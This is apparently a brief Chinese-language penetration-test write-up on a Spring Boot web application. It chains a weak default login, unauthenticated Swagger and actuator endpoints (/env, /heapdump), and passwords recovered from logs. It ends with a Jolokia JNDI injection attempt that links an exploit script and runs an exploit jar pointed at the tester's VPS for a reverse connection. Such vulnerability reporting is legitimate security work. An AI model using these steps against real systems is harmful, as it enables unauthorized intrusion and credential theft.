No.0
引言
事实上,已经对漏洞进行了基本修复。
No.1
入口
从config.js
中获取大量接口,导致漏洞成为一个全面的问题。
No.2
弱口令 – dev/DevAdmin
No.3
未授权访问Swagger + 信息泄露
在Swagger中存在大量接口,可以通过这些接口进行功能测试。通过叠加page
和pageSize
参数,实现未经授权的敏感信息获取。
No.4
Spring Boot未授权访问
推荐使用工具:JDumpSpider-1.0-SNAPSHOT-full.jar
和 heapdump_tool.jar
/env
/heapdump
对应第一个弱口令,获取其他敏感信息。
No.5
Heapdump文件下载
No.6
信息泄露
有些人会聪明地更改默认密码,但却忽略了logfile
中记录的大量登录日志。通过分析日志,找到对方修改的密码。
No.7
Jolokia JNDI注入
当携带createJNDIRealm
参数时,可尝试利用RCE。推荐使用脚本:
https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py
bashCopy code
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [VPS]
python3 jolokia.py
对方反弹回显,但由于对方存在WAF或其他设备,未成功获取shell。
成果展示: 由于通用Web弱口令提交CNVD会转化为事件类型,因此没有提交,仅提交了Heapdump信息泄露漏洞。
暂无评论内容